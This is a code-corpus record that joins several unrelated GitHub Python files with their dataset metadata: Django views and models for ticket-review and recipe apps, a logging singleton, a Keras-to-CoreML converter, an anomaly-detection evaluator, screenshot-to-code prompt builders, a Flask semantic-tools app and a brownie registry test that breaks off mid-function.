users_followed_ids = UserFollows.objects.filter(user=request.user).values_list('followed_user', flat=True)
# Récupérer les avis associés aux tickets pour l'utilisateur connecté et les utilisateurs suivis
reviews_followed = Review.objects.filter(
Q(user__in=users_followed_ids) | Q(ticket__user__in=users_followed_ids)
).select_related('user', 'ticket').annotate(content_type=Value('REVIEW', CharField()))
# Récupérer les tickets de l'utilisateur connecté et des utilisateurs suivis
tickets_user_and_followed = Ticket.objects.filter(
Q(user=request.user) | Q(user__in=users_followed_ids)
).annotate(content_type=Value('TICKET', CharField()))
# Combiner tous les objets (avis et tickets) et les trier par date de création
posts = sorted(chain(reviews_followed, tickets_user_and_followed),
key=lambda post: post.time_created, reverse=True)
# Récupérer les tickets déjà répondu par des avis
tickets_already_answer = tickets_user_and_followed.filter(review__in=reviews_followed)
return render(request, 'website/flux.html', context={'posts': posts, 'tickets_already_answer': tickets_already_answer})
@login_required
def create_ticket(request):
"""
Permit to create a new ticket
"""
ticket_form = forms.TicketForm()
if request.method == "POST":
ticket_form = forms.TicketForm(request.POST, request.FILES)
if ticket_form.is_valid():
ticket = ticket_form.save(commit=False)
ticket.user = request.user
ticket.save()
return redirect('flux')
context = {"ticket_form": ticket_form}
return render(request, 'website/create_ticket.html', context=context)
@login_required
def create_review(request):
"""
Permet de créer une nouvelle review avec un ticket associé
"""
if request.method == "POST":
ticket_form = forms.TicketForm(request.POST, request.FILES)
review_form = forms.ReviewForm(request.POST)
if ticket_form.is_valid() and review_form.is_valid():
ticket = ticket_form.save(commit=False)
ticket.user = request.user
ticket.save()
review = review_form.save(commit=False)
review.user = request.user
review.ticket = ticket
review.save()
return redirect('flux')
else:
ticket_form = forms.TicketForm()
review_form = forms.ReviewForm()
context = {"review_form": review_form, "ticket_form": ticket_form}
return render(request, 'website/create_review.html', context=context)
@login_required
def create_review_from_ticket(request, ticket_id):
"""
Permet de créer une review en réponse à un ticket
"""
ticket = None
review_form = forms.ReviewForm()
try:
ticket = Ticket.objects.get(pk=ticket_id)
if request.method == "POST":
review_form = forms.ReviewForm(request.POST)
if review_form.is_valid():
review = review_form.save(commit=False)
review.user = request.user
review.ticket = ticket
review.save()
return redirect('flux')
except UnboundLocalError:
return redirect('flux')
except Ticket.DoesNotExist:
return redirect('flux')
return render(request, 'website/create_review_from_ticket.html', context={"ticket": ticket, "review_form": review_form})
@login_required
def display_posts(request):
"""
Display all ticket et review from user connected
"""
tickets = Ticket.objects.filter(user=request.user)
tickets = tickets.annotate(content_type=Value('TICKET', CharField()))
reviews = Review.objects.filter(user=request.user)
reviews = reviews.annotate(content_type=Value('REVIEW', CharField()))
posts = sorted(chain(reviews, tickets),
key=lambda post: post.time_created, reverse=True)
return render(request, 'website/posts.html', context={"posts": posts})
@login_required
def follow_users(request):
"""
Manage the subscription system
"""
users_follow_you = [user_follow.user.username for user_follow in
UserFollows.objects.filter(followed_user=request.user.id)]
users_followed = UserFollows.objects.filter(user_id=request.user)
users_to_exclude = [user_followed.followed_user.username for user_followed in users_followed]
users_to_exclude.append(request.user.username)
users_to_follow = User.objects.exclude(username__in=users_to_exclude)
if request.method == "POST":
to_follow = User.objects.get(pk=request.POST["to_follow"])
if to_follow in users_to_follow:
UserFollows(user=request.user, followed_user=to_follow).save()
users_followed = UserFollows.objects.filter(user_id=request.user)
return render(request, 'website/follow_users.html', context={"users_followed": users_followed,
"users_to_follow": users_to_follow,
"users_follow_you": users_follow_you})
@login_required
def delete_follow_user(request, user_id):
"""
Delete a follow user
"""
try:
user_follow = UserFollows.objects.get(user=request.user, followed_user=user_id)
except UserFollows.DoesNotExist:
return redirect('follow_users')
if request.method == "POST":
user_follow.delete()
return redirect('follow_users')
@login_required
def delete_review(request, review_id):
"""
Delete a review
"""
try:
review = Review.objects.get(pk=review_id)
if review.user != request.user:
return redirect('posts')
except UserFollows.DoesNotExist:
return redirect('posts')
if request.method == "POST":
review.delete()
return redirect('posts')
@login_required
def update_review(request, review_id):
"""
Modifie a review
"""
try:
review = Review.objects.get(pk=review_id)
if review.user != request.user:
return redirect('posts')
except Review.DoesNotExist:
return redirect('posts')
review_form = forms.ReviewForm(instance=review)
if request.method == "POST":
update_form = forms.ReviewForm(request.POST)
if update_form.is_valid():
review_updated = update_form.save()
return redirect('posts')
context = {"review_form": review_form}
return render(request, 'website/update_review.html', context=context)
@login_required
def delete_ticket(request, ticket_id):
"""
Delete a review
"""
try:
ticket = Ticket.objects.get(pk=ticket_id)
if ticket.user != request.user:
return redirect('posts')
except UserFollows.DoesNotExist:
pass
if request.method == "POST":
ticket.delete()
return redirect('posts')
@login_required
def update_ticket(request, ticket_id):
"""
Modifie a ticket
"""
try:
ticket = Ticket.objects.get(pk=ticket_id)
if ticket.user != request.user:
return redirect('posts')
except Ticket.DoesNotExist:
return redirect('posts')
ticket_form = forms.TicketForm(instance=ticket)
if request.method == "POST":
update_form = forms.TicketForm(request.POST, request.FILES)
if update_form.is_valid():
ticket_updated = update_form.save()
return redirect('posts')
context = {"ticket_form": ticket_form}
return render(request, 'website/update_ticket.html', context=context)
| TMee3/DA-PYTHON-9 | website/views.py | views.py | py | 8,215 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "website.models.UserFollows.objects.filter",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "website.models.UserFollows.objects",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "website.models.UserFollows",
"line_number": 19,
"usage_... |
8192772574 | # -*- utf-8 -*-
########################################
# PSF license aggrement for logmsg.py
# Developed by Ivan Rybko
# Logmsg
########################################
from singleton import Singleton
import logging
@Singleton
class Logmsg:
def __init__(self, name):
if isinstance(name, str):
self.lname = name
self.lpath = self.lname + ".log"
def logmsg(self, message):
# create file handler which logs even debug messages
logger = logging.getLogger(self.lname)
logger.setLevel(logging.DEBUG)
# create file handler which logs even debug info messages
loghandler = logging.FileHandler(self.lpath)
loghandler.setLevel(logging.DEBUG)
# add format
frmt = logging.Formatter('{asctime} {name} {levelname:8s} {message}',style='{')
loghandler.setFormatter(frmt)
logger.addHandler(loghandler)
# add message
logger.debug(message)
logging.info(message)
def __call__(self, message):
self.logmsg(message)
def uselog(*args):
step1 = args[0]
step2 = args[1]
log = Logmsg(step1)
log(step2)
logs = {
"static": Logmsg("staticserver"),
"dynamic": Logmsg("dynamicserver"),
"httpserver": Logmsg("httpserver"),
"smtpserver": Logmsg("smtpserver"),
"wsgiserver": Logmsg("wsgiserver"),
"wsgiapp": Logmsg("wsgiapp"),
"imapclient": Logmsg("imapclient"),
"smtpclient": Logmsg("smtpclient"),
"httpclient": Logmsg("httpclient"),
"dbrequest": Logmsg("dbrequest")
}
| irybko/pyclasses | logmsg.py | logmsg.py | py | 1,573 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "logging.FileHandler",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "logging.DEBU... |
70816879145 | #!/usr/bin/env python
'''
./converter.py \
--model model.h5 \
--desc "Predicts either a phone is in the hands or in a pocket" \
--input_desc "Sensor samples (acc, gyro, mag, 50Hz)" \
--output_desc "1 - phone in the hands, 0 - phone in a pocket" \
--author "Danylo Kostyshyn" \
--license="MIT"
'''
from __future__ import absolute_import
import os
import argparse
import coremltools
import numpy as np
from keras.models import load_model
parser = argparse.ArgumentParser(description='Converts Keras .h5 model to CoreML .mlmodel')
parser.add_argument('--model', dest='model_name', help='Input model name')
parser.add_argument('--desc', dest='desc', help='Short description')
parser.add_argument('--input_desc', dest='input_desc', help='Input description')
parser.add_argument('--output_desc', dest='output_desc', help='Oouput description')
parser.add_argument('--author', dest='author', help='Author')
parser.add_argument('--license', dest='license', help='License')
args = parser.parse_args()
def main():
model_name = args.model_name
keras_model = load_model(model_name)
coreml_model = coremltools.converters.keras.convert(keras_model, \
input_names='input', output_names='output')
coreml_model.input_description['input'] = args.input_desc
coreml_model.output_description['output'] = args.output_desc
coreml_model.short_description = args.desc
coreml_model.author = args.author
coreml_model.license = args.license
f_name, f_ext = os.path.splitext(model_name)
coreml_model.save(os.path.join(f_name + '.mlmodel'))
print("Success!")
if __name__ == '__main__':
main() | danylokos/activity-demo-model | converter.py | converter.py | py | 1,593 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "keras.models.load_model",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "coremltools.converters.keras.convert",
"line_number": 34,
"usage_type": "call"
},
{
... |
70939042984 | import os
import numpy as np
import matplotlib.pyplot as plt
from config import *
from model import get_model
from data import get_single_test
def evaluate(test_num):
model = get_model(train=TRAIN_MODEL)
print("got model")
test = get_single_test(test_num)
print("got test")
num_clips = test.shape[0] - CLIP_LEN
clips = np.zeros((num_clips, *DIM, N_CHANNELS))
# apply sliding window technique to get the clips
for i in range(num_clips):
clip = np.zeros((*DIM, N_CHANNELS))
for j in range(CLIP_LEN):
clip[j] = test[i+j, :, :, :]
clips[i] = clip
# get reconstruction cost of all the clips
reconstructed_clips = model.predict(clips, batch_size=BATCH_SIZE)
cost = np.array([
np.linalg.norm( clips[i] - reconstructed_clips[i] )
for i in range(num_clips)
])
# arregularity score
sa = (cost - np.min(cost)) / np.max(cost)
# regularity score
sr = 1.0 - sa
# plot scores
plt.plot(sr)
plt.ylabel('regularity score Sr(t)')
plt.xlabel('frame t')
if not os.path.exists(FIG_PATH):
os.makedirs(FIG_PATH)
plt.savefig(f'{FIG_PATH}/Figure_{(test_num or TEST_NUM):03d}.png')
# plt.show()
plt.clf()
if __name__=="__main__":
for i in range(4, 16):
evaluate(i)
| Colprit/VideoAnomolyDetection | main.py | main.py | py | 1,321 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "model.get_model",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "data.get_single_test",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"l... |
18394788465 | from typing import List, Union
from openai.types.chat import ChatCompletionMessageParam, ChatCompletionContentPartParam
from imported_code_prompts import (
IMPORTED_CODE_BOOTSTRAP_SYSTEM_PROMPT,
IMPORTED_CODE_IONIC_TAILWIND_SYSTEM_PROMPT,
IMPORTED_CODE_REACT_TAILWIND_SYSTEM_PROMPT,
IMPORTED_CODE_TAILWIND_SYSTEM_PROMPT,
IMPORTED_CODE_SVG_SYSTEM_PROMPT,
)
from screenshot_system_prompts import (
BOOTSTRAP_SYSTEM_PROMPT,
IONIC_TAILWIND_SYSTEM_PROMPT,
REACT_TAILWIND_SYSTEM_PROMPT,
TAILWIND_SYSTEM_PROMPT,
SVG_SYSTEM_PROMPT,
)
USER_PROMPT = """
Generate code for a web page that looks exactly like this.
"""
SVG_USER_PROMPT = """
Generate code for a SVG that looks exactly like this.
"""
def assemble_imported_code_prompt(
code: str, stack: str, result_image_data_url: Union[str, None] = None
) -> List[ChatCompletionMessageParam]:
system_content = IMPORTED_CODE_TAILWIND_SYSTEM_PROMPT
if stack == "html_tailwind":
system_content = IMPORTED_CODE_TAILWIND_SYSTEM_PROMPT
elif stack == "react_tailwind":
system_content = IMPORTED_CODE_REACT_TAILWIND_SYSTEM_PROMPT
elif stack == "bootstrap":
system_content = IMPORTED_CODE_BOOTSTRAP_SYSTEM_PROMPT
elif stack == "ionic_tailwind":
system_content = IMPORTED_CODE_IONIC_TAILWIND_SYSTEM_PROMPT
elif stack == "svg":
system_content = IMPORTED_CODE_SVG_SYSTEM_PROMPT
else:
raise Exception("Code config is not one of available options")
user_content = (
"Here is the code of the app: " + code
if stack != "svg"
else "Here is the code of the SVG: " + code
)
return [
{
"role": "system",
"content": system_content,
},
{
"role": "user",
"content": user_content,
},
]
# TODO: Use result_image_data_url
def assemble_prompt(
image_data_url: str,
generated_code_config: str,
result_image_data_url: Union[str, None] = None,
) -> List[ChatCompletionMessageParam]:
# Set the system prompt based on the output settings
system_content = TAILWIND_SYSTEM_PROMPT
if generated_code_config == "html_tailwind":
system_content = TAILWIND_SYSTEM_PROMPT
elif generated_code_config == "react_tailwind":
system_content = REACT_TAILWIND_SYSTEM_PROMPT
elif generated_code_config == "bootstrap":
system_content = BOOTSTRAP_SYSTEM_PROMPT
elif generated_code_config == "ionic_tailwind":
system_content = IONIC_TAILWIND_SYSTEM_PROMPT
elif generated_code_config == "svg":
system_content = SVG_SYSTEM_PROMPT
else:
raise Exception("Code config is not one of available options")
user_prompt = USER_PROMPT if generated_code_config != "svg" else SVG_USER_PROMPT
user_content: List[ChatCompletionContentPartParam] = [
{
"type": "image_url",
"image_url": {"url": image_data_url, "detail": "high"},
},
{
"type": "text",
"text": user_prompt,
},
]
# Include the result image if it exists
if result_image_data_url:
user_content.insert(
1,
{
"type": "image_url",
"image_url": {"url": result_image_data_url, "detail": "high"},
},
)
return [
{
"role": "system",
"content": system_content,
},
{
"role": "user",
"content": user_content,
},
]
| abi/screenshot-to-code | backend/prompts.py | prompts.py | py | 3,553 | python | en | code | 15,739 | github-code | 36 | [
{
"api_name": "typing.Union",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "imported_code_prompts.IMPORTED_CODE_TAILWIND_SYSTEM_PROMPT",
"line_number": 33,
"usage_type": "name"
},
{
"api_name": "imported_code_prompts.IMPORTED_CODE_TAILWIND_SYSTEM_PROMPT",
"line_nu... |
74747977385 | #MORFOLOJİK OPERASYONLAR
import cv2
import matplotlib.pyplot as plt
import numpy as np
#
img = cv2.imread("img.png",0)
plt.figure(),plt.imshow(img , cmap = "gray"),plt.axis("off")
#EROZYON -ön plandaki nesnenin sınırlarını aşındırır
kernel = np.ones((3,3),dtype = np.uint8)
result = cv2.erode(img, kernel, iterations = 1)
plt.figure(),plt.imshow(result , cmap = "gray"),plt.axis("off")
#GENİŞLEME - ön plandaki nesnenin sınırlarını genişletir - erozyonun tam tersidir
result2 = cv2.dilate(img , kernel , iterations = 1)
plt.figure(),plt.imshow(result2 , cmap = "gray"),plt.axis("off")
#AÇMA - erozyon + genişleme - gürültünün giderilmesinde faydalıdır
whiteNoise = np.random.randint(0,2,size = img.shape[:2])
whiteNoise = whiteNoise * 255
plt.figure(),plt.imshow(whiteNoise , cmap = "gray"),plt.axis("off")
noise_img = whiteNoise + img
plt.figure(),plt.imshow(noise_img , cmap = "gray"),plt.axis("off")
#açılma
opening = cv2.morphologyEx(noise_img.astype(np.float32),cv2.MORPH_OPEN,kernel)
plt.figure(),plt.imshow(opening , cmap = "gray"),plt.axis("off"),plt.title("Açilma")
#KAPATMA - genişleme+erozyon - ön plandaki nesnelerin içindeki küçük delikleri veya nesne üzerindeki küçük siyah noktaları kapatmak için kullanışlıdır
blackNoise = np.random.randint(0,2,size = img.shape[:2])
blackNoise = whiteNoise * -255
black_noise_img = img+blackNoise
black_noise_img[black_noise_img<=-245] =0
plt.figure(),plt.imshow(black_noise_img , cmap = "gray"),plt.axis("off"),plt.title("black noise")
closing = cv2.morphologyEx(black_noise_img.astype(np.float32),cv2.MORPH_CLOSE,kernel)
plt.figure(),plt.imshow(closing , cmap = "gray"),plt.axis("off"),plt.title("Kapanma")
#MORFOLOJİK GRADYAN - GENİŞLEME - EROZYON - GRADIENT
gradient = cv2.morphologyEx(img,cv2.MORPH_GRADIENT,kernel)
plt.figure(),plt.imshow(gradient , cmap = "gray"),plt.axis("off"),plt.title("GRADIENT")
plt.show()
| tetroweb/opencv_lessons | lessons/chapter_9.py | chapter_9.py | py | 1,993 | python | tr | code | 0 | github-code | 36 | [
{
"api_name": "cv2.imread",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.... |
75111308265 | from django.db import models
from mptt.models import MPTTModel, TreeForeignKey
from accounts.models import User
class Category(MPTTModel):
name = models.CharField(max_length=100, verbose_name='Имя категории')
slug = models.SlugField(max_length=100, verbose_name='Ссылка')
parent = TreeForeignKey('self',
verbose_name='Родитель',
related_name='children',
on_delete=models.SET_NULL,
blank=True,
null=True
)
class MPTTMeta:
level_attr = 'mptt_level'
order_insertion_by = ['name']
class Meta:
verbose_name = 'Категория'
verbose_name_plural = 'Категории'
def __str__(self):
return self.name
class Ingredients(models.Model):
name = models.CharField(max_length=100, verbose_name='Ингредиент')
slug = models.SlugField(max_length=100, verbose_name='Ссылка')
class Meta:
verbose_name = 'Ингредиент'
verbose_name_plural = 'Ингредиенты'
def __str__(self) -> str:
return self.name
class Dish(models.Model):
name = models.CharField(max_length=50, verbose_name='Название блюда')
slug = models.SlugField(max_length=50)
ingredients = models.ForeignKey(Ingredients,
related_name='ingredients',
verbose_name='Ингредиенты',
on_delete=models.CASCADE)
class Meta:
verbose_name = 'Блюда'
verbose_name_plural = 'Блюда'
def __str__(self) -> str:
return self.name
class DeyWeek(models.Model):
dey_name = models.CharField(max_length=50, verbose_name='День недели')
class Meta:
verbose_name = 'День'
verbose_name_plural = 'Дни'
def __str__(self) -> str:
return self.dey_name
class DishWeek(models.Model):
dish = models.ForeignKey(Dish,
related_name='dishweek',
verbose_name='Название блюда',
on_delete=models.CASCADE,
)
slug = models.SlugField(max_length=50)
ingredients = models.ForeignKey(Ingredients,
related_name='ingredient',
verbose_name='Ингредиенты',
on_delete=models.CASCADE)
dey_week = models.ForeignKey(DeyWeek,
related_name='deyweek',
verbose_name='Дни',
on_delete=models.CASCADE)
class Meta:
verbose_name = 'Блюдо на неделю'
verbose_name_plural = 'Блюда на неделю '
def __str__(self) -> str:
return f"Блюдо {self.dish}"
class Menu(models.Model):
author = models.ForeignKey(
User,
verbose_name='Автор',
related_name='Menu',
on_delete=models.CASCADE)
title = models.CharField(max_length=200, verbose_name='Заглавление')
category = models.ForeignKey(Category,
verbose_name='Категория',
related_name='Menu',
on_delete=models.SET_NULL,
null=True)
created_at = models.DateTimeField(
auto_now_add=True, verbose_name='Дата создания')
Ingredients = models.ForeignKey(
Ingredients,
verbose_name='Ингредиенты',
related_name='Ингредиент',
on_delete=models.CASCADE)
breakfast = models.ForeignKey(
Dish,
verbose_name='Завтрак',
related_name='Завтрак',
on_delete=models.CASCADE)
lunch = models.ForeignKey(
Dish,
verbose_name='Обед',
related_name='Обед',
on_delete=models.CASCADE)
dinner = models.ForeignKey(
Dish,
verbose_name='Ужин',
related_name='Ужин',
on_delete=models.CASCADE)
create_at = models.DateTimeField(
null=True, blank=True, verbose_name='Дата создания')
class Meta:
verbose_name = 'Меню'
verbose_name_plural = 'Меню'
def __str__(self):
return f"Владелец:{self.author} Завтрак: {self.breakfast} Обед: {self.lunch} Ужин:{self.dinner} Дата Создания записи {self.create_at}"
class Recipe(models.Model):
name = models.CharField(max_length=100, verbose_name='Название')
serves = models.CharField(max_length=50, verbose_name='Служит')
prep_time = models.DurationField(
default=0, verbose_name='Время подготовки')
cook_time = models.DurationField(
default=0, verbose_name='Время приготовления')
ingredients = models.ForeignKey(
Ingredients,
verbose_name='Ингредиенты',
related_name='Ингредиенты',
on_delete=models.CASCADE)
directions = models.TextField(verbose_name='Направление')
menu = models.ForeignKey(Menu,
verbose_name='Меню',
related_name='recipe',
on_delete=models.SET_NULL,
null=True,
blank=True
)
class Meta:
verbose_name = 'Рецепт'
verbose_name_plural = 'Рецепты'
def __str__(self) -> str:
return self.name
class Comment(models.Model):
title = models.CharField(max_length=50, verbose_name='Заглавление')
email = models.CharField(max_length=100, verbose_name='Email')
message = models.TextField(max_length=500, verbose_name='Сообщение')
menu = models.ForeignKey(Menu,
verbose_name='Меню',
related_name='comment',
on_delete=models.CASCADE,
)
author = models.ForeignKey(User,
verbose_name='Пользователь',
on_delete=models.SET_NULL,
null=True)
class Meta:
verbose_name = 'Коментарий'
verbose_name_plural = 'Коментарии'
def __str__(self) -> str:
return self.title
| Maksat-developer/ProjectDjangoShool | cook/blog/models.py | models.py | py | 6,738 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "mptt.models.MPTTModel",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "django.db.models.CharField",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "django.db.models",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "django... |
31213617621 | # set FLASK_APP=app
# set FLASK_ENV=development
# flask run
from flask import Flask, render_template, request
import semsim_funcs
import semtag_funcs
import semnull_funcs
import semcluster_funcs
import textCoder_funcs
app = Flask(__name__)
@app.route('/')
def home():
return render_template('index.html')
@app.route('/semsim')
def semsim():
return render_template('semsim.html')
@app.route('/semsim_results', methods=['GET', 'POST'])
def semsim_results():
target_words = ''.join(request.form['target_words'].lower().split()).split(',')
contrast_word = request.form['contrast_word']
pos_words = ''.join(request.form['pos_words'].lower().split()).split(',')
neg_words = ''.join(request.form['neg_words'].lower().split()).split(',')
relative_sims, target_words, pos_words, neg_words, error_message = semsim_funcs.get_sims(target_words, pos_words, neg_words, contrast_word=contrast_word)
print(relative_sims)
targets_with_sims = []
for z in zip(target_words, relative_sims):
this_str = ' '.join([z[0], str(round(z[1], 3))])
targets_with_sims.append(this_str)
return render_template('semsim_results.html', error_message=error_message, targets_with_sims=targets_with_sims, target_words=target_words, pos_words=pos_words, neg_words=neg_words, relative_sims=relative_sims, contrast_word=contrast_word)
@app.route('/semtag')
def semtag():
return render_template('semtag.html')
@app.route('/semtag_results', methods=['GET', 'POST'])
def semtag_results():
text = request.form['text']
tags = request.form['tags']
tags_in_vocab, output_all, output_sim_all, output_per_paragraph, output_sim_per_paragraph, output_paragraphs = semtag_funcs.get_semtags(text, tags)
tags_in_vocab_str = ','.join(tags_in_vocab)
output_per_paragraph_str = ','.join(output_per_paragraph)
output_sim_per_paragraph_str = ','.join([str(round(a, 3)) for a in output_sim_per_paragraph])
text = text.split('\n')
output_tag_with_sim_per_paragraph = []
for z in zip(output_per_paragraph, output_sim_per_paragraph):
this_str = ' '.join([z[0], str(round(z[1], 3))])
output_tag_with_sim_per_paragraph.append(this_str)
output_tag_with_sim_all = []
for z in zip(output_all, output_sim_all):
this_str = ' '.join([z[0], str(round(z[1], 3))])
output_tag_with_sim_all.append(this_str)
nested_info_per_paragraph = []
for z in zip(output_per_paragraph, output_sim_per_paragraph, output_paragraphs):
this_row = [z[0], round(z[1], 3), z[2]]
nested_info_per_paragraph.append(this_row)
return render_template('semtag_results.html', nested_info_per_paragraph=nested_info_per_paragraph,output_tag_with_sim_per_paragraph=output_tag_with_sim_per_paragraph, output_tag_with_sim_all=output_tag_with_sim_all,tags_in_vocab_str=tags_in_vocab_str, text=text, output_all=output_all, output_sim_all=output_sim_all, output_per_paragraph_str=output_per_paragraph_str, output_sim_per_paragraph_str=output_sim_per_paragraph_str)
@app.route('/semnull')
def semnull():
return render_template('semnull.html')
@app.route('/semnull_results', methods=['GET', 'POST'])
def semnull_results():
target_words = ''.join(request.form['target_words'].lower().split()).split(',')
contrast_word = request.form['contrast_word']
pos_words = ''.join(request.form['pos_words'].lower().split()).split(',')
neg_words = ''.join(request.form['neg_words'].lower().split()).split(',')
scores_to_test = request.form['scores_to_test']
template_sentence = request.form['template_sentence']
template_pos = request.form['template_pos']
print(target_words)
print(contrast_word)
null_distr_scores = semnull_funcs.get_semnull(pos_words, neg_words, template_sentence, template_pos)
N_random_words_found = len(null_distr_scores)
print(N_random_words_found)
p_values, target_words_scores, target_words_output, scores_to_test_output, error_message = semnull_funcs.get_p(target_words, pos_words, neg_words, scores_to_test, null_distr_scores, contrast_word=contrast_word)
p_values_nested = []
target_words_output.extend(scores_to_test_output)
print(p_values)
for z in zip(target_words_output, target_words_scores, p_values):
p_values_nested.append([z[0], round(z[1], 3), z[2]])
print(p_values_nested)
return render_template('semnull_results.html', error_message=error_message,null_distr_scores=null_distr_scores, N_random_words_found=N_random_words_found, p_values_nested=p_values_nested)
@app.route('/textCoder')
def textCoder():
return render_template('textCoder.html')
@app.route('/textCoder_results', methods=['GET', 'POST'])
def textCoder_results():
text = request.form['text']
print(text)
knowledge_list = textCoder_funcs.get_textCoder(text)
topics_str = ','.join([k[0] for k in knowledge_list])
attributes_str = ', '.join([a[0] for k in knowledge_list for a in k[1]])
text_in_paragraphs = text.split("\n")
nested_info_per_paragraph = []
nested_info_per_paragraph_count = []
nested_info_per_paragraph_parindex = []
topics_str_list = [k[0] for k in knowledge_list]
attr_str_list = [', '.join([a[0] for a in k[1]]) for k in knowledge_list]
for z in zip(topics_str_list, attr_str_list):
nested_info_per_paragraph.append([z[0], z[1]])
attr_str_count_list = [', '.join([a[0] + " (" + str(a[1]) + ")" for a in k[1]]) for k in knowledge_list]
for z in zip(topics_str_list, attr_str_count_list):
nested_info_per_paragraph_count.append([z[0], z[1]])
attr_str_parindex_list = [', '.join([a[0] + " (" + str(a[2]) + ")" for a in k[1]]) for k in knowledge_list]
for z in zip(topics_str_list, attr_str_parindex_list):
nested_info_per_paragraph_parindex.append([z[0], z[1]])
return render_template('textCoder_results.html', topics_str=topics_str, attributes_str=attributes_str, nested_info_per_paragraph=nested_info_per_paragraph, text_in_paragraphs=text_in_paragraphs,nested_info_per_paragraph_count=nested_info_per_paragraph_count,nested_info_per_paragraph_parindex=nested_info_per_paragraph_parindex)
@app.route('/semcluster')
def semcluster():
return render_template('semcluster.html')
@app.route('/semcluster_results', methods=['GET', 'POST'])
def semcluster_results():
words = request.form['words']
cluster_labels, cluster_items = semcluster_funcs.get_clusters(words)
cluster_info = []
for z in zip(cluster_labels, cluster_items):
cluster_info.append(['Cluster label: ' + z[0], 'Items: ' + ', '.join(z[1])])
return render_template('semcluster_results.html', words=words, cluster_info=cluster_info)
| thomasgladwin/webapps | app.py | app.py | py | 6,804 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "flask.request... |
6143716089 | import itertools
import math
from collections import defaultdict
import brownie
import pytest
from scripts.utils import pack_values
ZERO_ADDRESS = "0x0000000000000000000000000000000000000000"
@pytest.fixture(scope="module", autouse=True)
def registry(
Registry,
provider,
gauge_controller,
alice,
lending_swap,
lp_token,
n_coins,
is_v1,
rate_method_id,
underlying_decimals,
wrapped_decimals,
chain,
):
registry = Registry.deploy(provider, gauge_controller, {"from": alice})
registry.add_pool(
lending_swap,
n_coins,
lp_token,
rate_method_id,
pack_values(wrapped_decimals),
pack_values(underlying_decimals),
hasattr(lending_swap, "initial_A"),
is_v1,
"",
{"from": alice},
)
chain.sleep(10)
registry.remove_pool(lending_swap, {"from": alice})
yield registry
@pytest.mark.itercoins("send", "recv")
def test_find_pool(registry, wrapped_coins, underlying_coins, send, recv):
assert registry.find_pool_for_coins(wrapped_coins[send], wrapped_coins[recv]) == ZERO_ADDRESS
assert (
registry.find_pool_for_coins(underlying_coins[send], underlying_coins[recv]) == ZERO_ADDRESS
)
def test_get_n_coins(registry, lending_swap):
assert registry.get_n_coins(lending_swap) == [0, 0]
def test_get_coins(registry, lending_swap):
assert registry.get_coins(lending_swap) == [ZERO_ADDRESS] * 8
assert registry.get_underlying_coins(lending_swap) == [ZERO_ADDRESS] * 8
def test_get_decimals(registry, lending_swap):
assert registry.get_decimals(lending_swap) == [0] * 8
assert registry.get_underlying_decimals(lending_swap) == [0] * 8
def test_get_rates(registry, lending_swap):
assert registry.get_rates(lending_swap) == [0] * 8
@pytest.mark.itercoins("send", "recv")
def test_get_coin_indices(registry, lending_swap, underlying_coins, wrapped_coins, send, recv):
with brownie.reverts("No available market"):
registry.get_coin_indices(lending_swap, wrapped_coins[send], wrapped_coins[recv])
with brownie.reverts("No available market"):
registry.get_coin_indices(lending_swap, underlying_coins[send], underlying_coins[recv])
@pytest.mark.once
def test_get_balances(registry, lending_swap):
with brownie.reverts():
registry.get_balances(lending_swap)
@pytest.mark.once
def test_get_underlying_balances(registry, lending_swap):
with brownie.reverts():
registry.get_underlying_balances(lending_swap)
@pytest.mark.once
def test_get_admin_balances(registry, lending_swap):
with brownie.reverts():
registry.get_admin_balances(lending_swap)
@pytest.mark.once
def test_get_virtual_price_from_lp_token(alice, registry, lp_token):
with brownie.reverts():
registry.get_virtual_price_from_lp_token(lp_token)
@pytest.mark.once
def test_get_pool_from_lp_token(registry, lp_token):
assert registry.get_pool_from_lp_token(lp_token) == ZERO_ADDRESS
@pytest.mark.once
def test_get_lp_token(registry, lending_swap):
assert registry.get_lp_token(lending_swap) == ZERO_ADDRESS
def test_coin_count_is_correct(registry):
assert registry.coin_count() == 0
def test_get_all_swappable_coins(registry, wrapped_coins, underlying_coins):
coin_set = set(map(str, itertools.chain(wrapped_coins, underlying_coins)))
coin_count = len(coin_set)
coins = set(registry.get_coin(i) for i in range(coin_count))
assert coins == {ZERO_ADDRESS}
@pytest.mark.once
def test_last_updated_getter(registry, history):
registry_txs = history.filter(receiver=registry.address)
assert math.isclose(registry_txs[-1].timestamp, registry.last_updated())
def test_coin_swap_count(registry, wrapped_coins, underlying_coins):
coins = set(map(str, itertools.chain(wrapped_coins, underlying_coins)))
for coin in coins:
assert registry.get_coin_swap_count(coin) == 0
def test_swap_coin_for(registry, wrapped_coins, underlying_coins):
wrapped_coins = list(map(str, wrapped_coins))
underlying_coins = list(map(str, underlying_coins))
pairings = defaultdict(set)
wrapped_pairs = itertools.combinations(wrapped_coins, 2)
underlying_pairs = itertools.combinations(underlying_coins, 2)
for coin_a, coin_b in itertools.chain(wrapped_pairs, underlying_pairs):
